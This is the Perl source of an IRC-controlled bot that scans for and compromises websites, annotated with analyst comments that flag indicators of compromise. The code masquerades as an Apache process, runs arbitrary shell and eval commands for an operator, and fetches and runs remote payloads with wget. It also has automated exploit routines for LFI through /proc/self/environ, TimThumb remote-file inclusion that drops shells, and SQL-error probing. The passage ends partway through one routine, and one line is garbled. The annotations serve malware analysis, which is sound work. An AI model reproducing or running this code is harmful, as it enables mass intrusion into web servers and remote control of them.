- #!/usr/bin/perl
- #################################################
- $powered="jembot"; #
- $mail="root@jem.bot"; #
- #################################################
- #################PERL MODULES####################
- use HTTP::Request; #
- use HTTP::Request::Common; #
- use HTTP::Request::Common qw(POST); #
- use LWP::Simple; #
- use LWP 5.53; #
- use LWP::UserAgent; #
- use Socket; #
- use IO::Socket; #
- use IO::Socket::INET; #
- use IO::Select; #
- use URI::URL; #
# Analyst note: IRC command-and-control (C2) settings. The server, port,
# channel, ident and operator nick below are the network indicators for this
# sample; the server can be overridden by the first command-line argument.
- ################BASIC CONNECTING#################
- my $datetime = localtime; #
# Written into $0 further down, so the process is renamed to this string.
- my $fakeproc = "/usr/sbin/apache45"; #
- my $ircserver = "irc.byroe.net"; #
- my $ircport = "6667"; #
# Nick is "ef-{N}" with N an integer from 0 to 99.
- my $nickname = "ef-{".int(rand(100))."}"; #
- my $ident = "HAcKeD"; #
- my $channel = "#non"; #
# Commands are honoured from this nickname (see isAdmin).
- my $admin = "Egypt-Hacker"; #
- my $fullname = "INFO"; #
- #################################################
# Message prefixes. The digit runs are presumably mIRC colour codes whose
# control byte was lost in the paste -- TODO confirm against a raw copy.
- ####################LOGO####################################
- my $nob0dy = "15(9@13nob0dy15)"; #
- my $vulN = "15(9@6VuLn!15)"; #
- my $thumblogo = "15(9@11ThuMB15)"; #
- my $sqllogo = "15(9@11SQL15)"; #
- my $lfilogo = "15(9@11Lfi15)"; #
# Channel commands that start the three scan routines.
- ##################COMMAND####################################
- my $thumbcmd = '!thumb'; #
- my $sqlcmd = '!sql'; #
- my $lficmd = '!lfi'; #
# Remote payload locations referenced by the scan routines. Treat these URLs
# as indicators for blocking and log searches; do not fetch them outside an
# isolated analysis environment.
- ##################INJECTOR########################################
- my $injector = "http://pastebin.com/raw.php?i=izAyQE2f"; #
- my $thumbshell = "http://picasa.com.nabbc.org/w00t.php"; #
- my $bot = "http://picasa.com.nabbc.org/bot.php"; #
- my $lfiinjector = "http://pastebin.com/raw.php?i=ukHveP61"; #
- my $shellbot = "http://picasa.com.nabbc.org/r0x"; #
- ##################################################################
# File names thumb() requests under a site's cache/temp directories. A .php
# file with one of these names inside a thumbnail cache is a compromise
# indicator worth searching web roots for.
- ########################################TIMTHUMB PATH#######################################################
- my $folder1 = "/cache/35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $folder2 = "/cache/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $folder3 = "/temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $folder4 = "/temp/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $folder5 = "/wp-content/uploads/thumb-temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
- my $bot1 = "/cache/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
- my $bot2 = "/cache/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
- my $bot3 = "/temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
- my $bot4 = "/temp/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
- my $bot5 = "/wp-content/uploads/thumb-temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; # #
- ############################################################################################################
# Only one User-Agent is listed, so the "random" pick always returns it. The
# same string is sent by get_content() and search_engine_query().
- my @uagents = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6");
- my $uagent = $uagents[rand(scalar(@uagents))];
# INT, HUP and TERM are ignored, so only an uncatchable signal stops the
# process; ignoring CHLD is what usually lets the kernel reap the forked
# workers. 'PS' does not look like a standard signal name.
- $SIG{'INT'} = 'IGNORE';
- $SIG{'HUP'} = 'IGNORE';
- $SIG{'TERM'} = 'IGNORE';
- $SIG{'CHLD'} = 'IGNORE';
- $SIG{'PS'} = 'IGNORE';
- $ircserver = "$ARGV[0]" if $ARGV[0];
# Process-name masquerade: $0 is overwritten with $fakeproc plus NUL padding.
# Detection has to rely on the real executable (perl) and its open sockets
# rather than on the displayed command name.
- $0 = "$fakeproc"."\0" x 16;;
# Detach: the parent exits and the child carries on in the background.
- my $pid = fork;
- exit if $pid;
- die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
- our %irc_servers;
- our %DCC;
# $dcc_sel is not used again in the visible source. $sel_client is an
# undeclared package global (the script does not enable strict).
- my $dcc_sel = new IO::Select->new();
- $sel_client = IO::Select->new();
# Writes one newline-terminated line to an IRC socket.
# Called with two arguments, the first is the socket and the second the text;
# with any other argument count the text is $_[0] and the global
# $IRC_cur_socket is used. Nothing is filtered, so any CR/LF inside the text
# reaches the server as additional protocol lines.
- sub sendraw {
- if ($#_ == '1') {
- my $socket = $_[0];
- print $socket "$_[1]\n";
- } else {
- print $IRC_cur_socket "$_[0]\n";
- }
- }
# Opens the TCP connection to the C2 server and registers on IRC.
# Arguments: nick, server host, server port. Returns 1 if the connect fails.
# On success the socket becomes $IRC_cur_socket, is added to $sel_client and
# recorded in %irc_servers (host, port, nick, local address), then NICK and
# USER are sent. The USER line carries $ident and the fixed real-name string
# in $versi, both usable as network signatures.
- sub connector {
- my $mynick = $_[0];
- my $ircserver_con = $_[1];
- my $ircport_con = $_[2];
- my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
- if (defined($IRC_socket)) {
- $IRC_cur_socket = $IRC_socket;
- $IRC_socket->autoflush(1);
- $sel_client->add($IRC_socket);
- $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
- $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
- nick("$mynick");
- my $versi = "15[!]11TimThumB bot 04(09,01s4l1ty04) 15[!]";
- sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
- sleep (1);}}
# Handles one server line of IRC housekeeping.
#   PING        -> answers with PONG.
#   NICK        -> tracks a change of the bot's own nick.
#   433         -> asks for a new nick: the current one plus int rand(1),
#                  which always evaluates to 0.
#   001         -> records nick and server name, sets mode +iB, joins
#                  $channel and posts a fixed announcement line.
# $mynick is a package global shared with the main loop. The JOIN and the
# announcement text are observable on the wire right after registration.
- sub parse {
- my $servarg = shift;
- if ($servarg =~ /^PING \:(.*)/) {
- sendraw("PONG :$1");
- }
- elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
- if (lc($1) eq lc($mynick)) {
- $mynick = $4;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- }
- }
- elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
- nick("$mynick".int rand(1));
- }
- elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
- $mynick = $2;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
- sendraw("MODE $mynick +iB");
- sendraw("JOIN $channel");
- sleep(2);
- sendraw("PRIVMSG $channel :14[04!14]11TimhuMB BoT 09,01Up09...04!");
- }
- }
# Main event loop: keeps the IRC connection alive, reads server data and
# dispatches commands received as PRIVMSG. It has no exit condition of its own.
- my $line_temp;
- while( 1 ) {
# Reconnect until a server is registered in %irc_servers.
- while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
- select(undef, undef, undef, 0.01);;
- delete($irc_servers{''}) if (defined($irc_servers{''}));
- my @ready = $sel_client->can_read(0);
- next unless(@ready);
- foreach $fh (@ready) {
- $IRC_cur_socket = $fh;
- $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
- $nread = sysread($fh, $ircmsg, 4096);
# A zero-byte read means the peer closed the connection; the socket is
# dropped and the outer loop reconnects.
- if ($nread == 0) {
- $sel_client->remove($fh);
- $fh->close;
- delete($irc_servers{$fh});
- }
- @lines = split (/\n/, $ircmsg);
- $ircmsg =~ s/\r\n$//;
# The PRIVMSG pattern is applied to the whole read buffer, not line by line.
# $path is the message target: the bot's nick for a private message,
# otherwise a channel name.
- if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
- my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
- my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR,DooGatE,sogou,interia,snz,yandex,joeant,terra,youdao,amfibi,bigclique,dancefloor,live,rakuten,biglobe,nova,najdi,goo,uksubmit,excite";
# ---- Private-message branch ----
- if ($path eq $mynick) {
- if ($msg =~ /^PING (.*)/) {
- sendraw("NOTICE $nick :PING $1");
- }
- if ($msg =~ /^VERSION/) {
- sendraw("NOTICE $nick :VERSION TimThumb Bot scanner by s4l1ty");
- }
- if ($msg =~ /^TIME/) {
- sendraw("NOTICE $nick :TIME ".$datetime."");
- }
# Every privileged command is gated by isAdmin($nick), which compares the
# sender's nickname only; $ident and $host are captured above but never
# checked. For an infected host this means whoever holds that nick on the
# C2 network can run commands on it.
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
# !killall kills every perl process, then downloads and runs a fresh copy
# from the URL in the command string. The temporary file name paste.jpg and
# that URL are host and network indicators.
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg eq "!rehash") {
- sendraw("QUIT : Rehasing...");
- &shell("$path","kill -9 $$;perl '.$0");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
- sendraw("NICK ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- sendraw($IRC_cur_socket, "PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
- }
# Any private message from the operator nick that does not start with "!"
# is handed to shell() as a command line.
- if (&isAdmin($nick) && $msg !~ /^!/) {
- &shell("$nick","$msg");
- }
- }
# ---- Channel-message branch ----
- else {
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg eq "!rehash") {
- sendraw("QUIT : Rehasing...");
- &shell("$path","kill -9 $$;perl '.$0");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg eq "!part") {
- sendraw("PART $path");
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
# ".x <cmd>" and "<botnick> <cmd>" both pass the text to shell().
- if (&isAdmin($nick) && $msg =~ /^\.x (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
- &shell("$path","$1");
- }
# !eval passes the text to string eval: arbitrary Perl inside this process.
- if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
- eval "$1";
- }
# Apart from !pid, the commands from here to the end of this branch are NOT
# gated by isAdmin(): any sender in a channel the bot has joined can trigger
# them, including the outbound connect in !port and the three scan commands.
- ##################################################################### HELP COMMAND
- if ($msg=~ /^!help/) {
- my $helplogo = "15(14@03Help15";
- &msg("$path","$helplogo 15 #####################4[HELP]15##############################");
- &msg("$path","$helplogo 03 ( $sqlcmd [bug][dork] ) sql scan ");
- &msg("$path","$helplogo 03 ( $thumbcmd [bug][dork] ) TimThumb scan ");
- &msg("$path","$helplogo 03 ( $lficmd [bug][dork] ) TimThumb scan ");
- &msg("$path","$helplogo 15 6END HELP ===>");
- }
- if ($msg=~ /^!engine/) {
- my $enginelogo = "06(09@11eNgine6)";
- &msg("$path","$enginelogo 04GooGLe,Bing,ALtaViSTa,AsK,UoL,YahOo.");
- &msg("$path","$enginelogo 04Will Be Updated as soon");
- }
- if ($msg=~ /^!about/) {
- my $aboutlogo = "15(09@11About15)";
- &msg("$path","$aboutlogo 09,01Priv8 Bot 11v0.13");
- &msg("$path","$aboutlogo 09,01© Copy Right 2012 04s4l1ty");
- }
- if ($msg=~ /^!version/) {
- my $versionlogo = "15(09@11Version15)";
- &msg("$path","$versionlogo 13,11WordPress,Sql,Lfi 04fucker");
- }
# Checks that the remote payload at $lfiinjector is reachable by fetching it
# and looking for the string "str_rot13" in the body.
- if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
- if (&isFound($lfiinjector,"str_rot13")) {
- &msg("$path","15,1(9@11Injector15 => 4Ready!!!");
- } else {
- &msg("$path","15,01(09@11Injector15 => 12Undetected.");
- }
- }
# NOTE(review): the call below is garbled in the paste; presumably an HTML
# entity was decoded over the start of a sub call -- TODO confirm.
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- ¬ice("$nick","PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
- }
- #####################################################################
# !port <host> <port>: one TCP connect from this host (7 s timeout), result
# reported to the channel. Shows up as outbound connections to arbitrary
# hosts and ports originating from a web server.
- if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
- my $hostip= "$1";
- my $portsc= "$2";
- my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
- if ($scansock) {
- &msg("$path","15(9@11PORT15)7 $hostip : $portsc 9Accepted");
- }
- else {
- &msg("$path","15(9@11PORT15)7 $hostip : $portsc 4connection refused");
- }
- }
# !ip <addr>: POSTs the address to a third-party geolocation page and scrapes
# the reply. Runs in a double-forked grandchild so the main loop is not held up.
- if ($msg=~ /^!ip\s+(.*)/ ) {
- if (my $pid = fork) { waitpid($pid, 0); } else {
- if (fork) { exit; } else {
- my $ip = $1;
- &msg("$path","15(9@11IP15)7 Searching ".$ip." 6Location ...");
- my $website = "http://www.ipligence.com/geolocation";
- my ($useragent,$request,$response,%form);
- undef %form;
- $form{ip} = $ip;
- $useragent = LWP::UserAgent->new;
- $useragent->timeout(5);
- $request = POST $website,\%form;
- $response = $useragent->request($request);
- if ($response->is_success) {
- my $res = $response->content;
- if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {
- my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
- &msg("$path","15(9@11IP15)7IP Address : ".$ip."15 (9".$ipaddress."15 )");
- &msg("$path","15(9@11IP15)7 City : ".$ip."15 (9".$city."15 )");
- &msg("$path","15(9@11IP15)7 Country : ".$ip."15 (9".$country."15 )");
- &msg("$path","15(9@11IP15)7 Continent : ".$ip."15 (9".$continent."15 )");
- }
- else {
- &msg("$path","15(9@11IP15)7 ".$ip." 6not found in database");
- }
- }
- else {
- &msg("$path","15(9@11IP15)4 Cannot open IP database.");
- }
- }
- exit;
- }
- }
# !base64 <text>: replies with both the Base64 encoding and decoding of the text.
- if ($msg=~ /^!base64 (.*)$/ ) {
- if (my $pid = fork) { waitpid($pid, 0); } else {
- if (fork) { exit; } else {
- my $hash = $1;
- my $base64_encoded = encode_base64($hash);
- my $base64_decoded = decode_base64($hash);
- &msg("$path","15(9@11BASE6415)12 Decode : $base64_decoded");
- &msg("$path","15(9@11BASE6415)12 Encode : $base64_encoded");
- }
- exit;
- }
- }
# The three scan commands share one shape: "<cmd> <path suffix> <search term>".
# Each double-forks and hands the arguments to the matching *_start routine
# with a fixed list of seven search engines.
- ##############################################################################
- if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$thumblogo 6Dork :11 $dork");
- &msg("$path","$thumblogo 11Bugz :6 $bug");
- &msg("$path","$thumblogo 4Working.!!!");
- &timthumb_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
- }
- exit;
- }
- }
- #####################################################################
- if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$sqllogo 6Dork :11 $dork");
- &msg("$path","$sqllogo 11Bugz :6 $bug");
- &msg("$path","$sqllogo 4Working.!!!");
- &sql_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
- }
- exit;
- }
- }
- #####################################################################
- if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$lfilogo 6Dork :11 $dork");
- &msg("$path","$lfilogo 11Bugz :6 $bug");
- &msg("$path","$lfilogo 4Working.!!!");
- &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
- }
- exit;
- }
- }
- #####################################################################
- }
- }
# Line reassembly for parse(): every split line but the last is parsed at
# once; the last is parsed only if it is the sole line, ended in \r, or is a
# "NOTICE AUTH" banner. Otherwise it is kept in $line_temp and prefixed to
# the first line of the next read.
- for(my $c=0; $c<= $#lines; $c++) {
- $line = $lines[$c];
- $line = $line_temp.$line if ($line_temp);
- $line_temp = '';
- $line =~ s/\r$//;
- unless ($c == $#lines) {
- parse("$line");
- } else {
- if ($#lines == 0) {
- parse("$line");
- } elsif ($lines[$c] =~ /\r$/) {
- parse("$line");
- } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
- parse("$line");
- } else {
- $line_temp = $line;
- }
- }
- }
- }
- }
- #########################################
# Fans a TimThumb scan out over the requested search engines.
# Arguments: channel, path suffix, search term, comma-separated engine list.
# For every engine name found in the list (case-insensitive) a double-forked
# grandchild runs thumb() for that engine, so one command can leave up to
# seven detached perl processes running at once.
- sub timthumb_start() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- if ($engine =~ /google/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"GooGLe");
- } exit; }
- }
- if ($engine =~ /alltheweb/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"AllTheWeb");
- } exit; }
- }
- if ($engine =~ /bing/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"Bing");
- } exit; }
- }
- if ($engine =~ /altavista/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"ALtaViSTa");
- } exit; }
- }
- if ($engine =~ /ask/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"AsK");
- } exit; }
- }
- if ($engine =~ /uol/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"UoL");
- } exit; }
- }
- if ($engine =~ /yahoo/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &thumb($chan,$bug,$dork,"YahOo");
- } exit; }
- }
- }
- #########################################
# Fans an SQL-error scan out over the requested search engines.
# Same shape as timthumb_start(): arguments are channel, path suffix, search
# term and engine list, and each engine named in the list gets its own
# double-forked grandchild running sql().
- sub sql_start() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- if ($engine =~ /google/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"GooGLe");
- } exit; }
- }
- if ($engine =~ /alltheweb/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"AllTheWeb");
- } exit; }
- }
- if ($engine =~ /bing/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"Bing");
- } exit; }
- }
- if ($engine =~ /altavista/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"ALtaViSTa");
- } exit; }
- }
- if ($engine =~ /ask/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"AsK");
- } exit; }
- }
- if ($engine =~ /uol/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"UoL");
- } exit; }
- }
- if ($engine =~ /yahoo/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &sql($chan,$bug,$dork,"YahOo");
- } exit; }
- }
- }
- #########################################
# Fans a local-file-inclusion scan out over the requested search engines.
# Same shape as timthumb_start(): arguments are channel, path suffix, search
# term and engine list, and each engine named in the list gets its own
# double-forked grandchild running lfi().
- sub lfi_start() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- if ($engine =~ /google/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"GooGLe");
- } exit; }
- }
- if ($engine =~ /alltheweb/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"AllTheWeb");
- } exit; }
- }
- if ($engine =~ /bing/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"Bing");
- } exit; }
- }
- if ($engine =~ /altavista/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"ALtaViSTa");
- } exit; }
- }
- if ($engine =~ /ask/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"AsK");
- } exit; }
- }
- if ($engine =~ /uol/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"UoL");
- } exit; }
- }
- if ($engine =~ /yahoo/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &lfi($chan,$bug,$dork,"YahOo");
- } exit; }
- }
- }
- #########################################
# Per-engine local-file-inclusion probe.
# Arguments: channel, path suffix, search term, engine name. Candidate hosts
# come from search_engine(). For each one the routine requests the suffix
# followed by a directory-traversal string ending in /proc/self/environ and
# treats a response containing both "DOCUMENT_ROOT=/" and "HTTP_USER_AGENT="
# as a hit. Follow-up requests go through lfi_env_query(), which is not
# defined in the visible source. Results are posted to the channel or to the
# operator nick.
#
# Defender view: on a probed site the access log shows a long run of "../"
# ending in /proc/self/environ%0000 or /tmp/Crash%0000. /tmp/Crash and
# /tmp/w00t are the file names this routine tries to create on the target,
# and the marker strings matched below identify its payload's output.
- sub lfi() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$lfilogo15(9@7$engine15)10 Scan finish..."); }
- my $dir = "../../../../../../../../../../../../../../../";
# $vuln and $shell are display strings only; the embedded "09"/"04" are
# presumably colour codes, so they are not requestable URLs as written.
- my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
- my $vuln = "http://".$site.$bug.$dir."09/proc/self/environ%0000";
- my $shell = "http://".$site.$bug.$dir."04/tmp/Crash%0000";
- my $html = get_content($test);
- if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $code = 'echo "s4l1ty#".php_uname()."#s4l1ty"; if(@copy("'.$lfiinjector.'","/tmp/Crash")) { echo "SUCCESS"; }';
- my $res = lfi_env_query($test,encode_base64($code));
- $res =~ s/\n//g;
- if ($res =~ /s4l1ty#(.*)#s4l1tySUCCESS/sg) {
- my $sys = $1;
- &msg("$chan","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
- sleep(4);
- }
- elsif ($res =~ /s4l1ty#(.*)#s4l1ty/sg) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $sys = $1;
- my $upload = 'system("wget '.$lfiinjector.' -O /tmp/Crash");';
- my $upload1 = 'system("wget '.$botshell.' -O /tmp/w00t");';
- my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
- my $wget1 = lfi_env_query($test,encode_base64($upload1)); sleep(2);
- my $check = get_content("http://".$site.$bug.$dir."/tmp/Crash%0000"); sleep(1);
- if ($check =~ /Hijacked by s4l1ty/) {
- &msg("$admin","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
- sleep(2);
- }
- else {
- &msg("$chan","$lfilogo15(09@3$engine15)15(09@04SysTem15)4 ".$vuln." 15(09@03".$sys."15)$vulN");
- sleep(2);
- }
- } exit; }
- }
- else { &msg("$chan","$lfilogo15(09@3$engine15)15(09@06eNviRon15)06 ".$vuln.""); }
- } exit; } sleep(2);
- }
- }
- }
- }
- #########################################
# Per-engine SQL-error probe.
# Arguments: channel, path suffix, search term, engine name. For each
# candidate host from search_engine() it requests the suffix with a single
# quote appended and sorts the response by the database error text it
# contains (MySQL, MS SQL Server, MS Access/Oracle provider strings). Matches
# are posted to the channel; the last elsif has an empty body, so those
# matches are not reported. The sleep(2) after exit is unreachable.
#
# Defender view: the request is a plain GET ending in "'" with the bot's
# fixed User-Agent. Verbose database errors returned to clients are what make
# a site show up in this scan.
- sub sql() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$sqllogo15(9@7$engine15)10 Scan finish..."); }
- my $test = "http://".$site.$bug."'";
- my $vuln = "http://".$site.$bug;
- my $sqlsite = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
- &msg("$chan","$sqllogo15(04@3$engine15)15(09@04MySQL15) 03,01".$vuln);}
- elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
- &msg("$chan","$sqllogo15(04@3$engine15)15(09@04MsSQL15) 03,01".$vuln);}
- elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
- &msg("$chan","$sqllogo15(4@3$engine15)15(09@04MsAccess15) 03,01".$vuln);}
- elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
- } exit; sleep(2); }
- }
- }
- }
- }
- #########################################
# Per-engine TimThumb probe.
# Arguments: channel, script path, search term, engine name. For each
# candidate host from search_engine() it requests the script path with
# "?src=" set to the remote URLs in $thumbshell and $bot. If the first
# response contains "Unable to ", it then requests the fixed cache/temp file
# names from $folder1..5 and $bot1..5. A response containing
# "JANCOK- exploit" is reported to the operator nick and to the channel with
# OS, disk-space and uid fields scraped from it.
#
# Defender view: look for "?src=http://..." requests naming an off-site host
# in access logs, and for .php files with the listed names inside thumbnail
# cache/temp directories. The marker string matched below identifies the
# dropped page.
- sub thumb() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) {
- &msg("$chan","$thumblogo 15(09@03$engine15)2 Scan finish...");
- }
- my $vuln = "http://".$site.$bug."?src=".$thumbshell;
- my $bot = "http://".$site.$bug."?src=".$bot;
- my $cek = &get_content($vuln);sleep(2);&get_content($bot);sleep(2);
- if ($cek =~ /Unable to /i) {
# $tpath is the script path with its last component removed.
- (my $tpath = $bug)=~ s{/[^/]+\z}{};
- my $vuln2 = "http://".$site.$tpath.$folder1;
- my $vuln3 = "http://".$site.$tpath.$folder2;
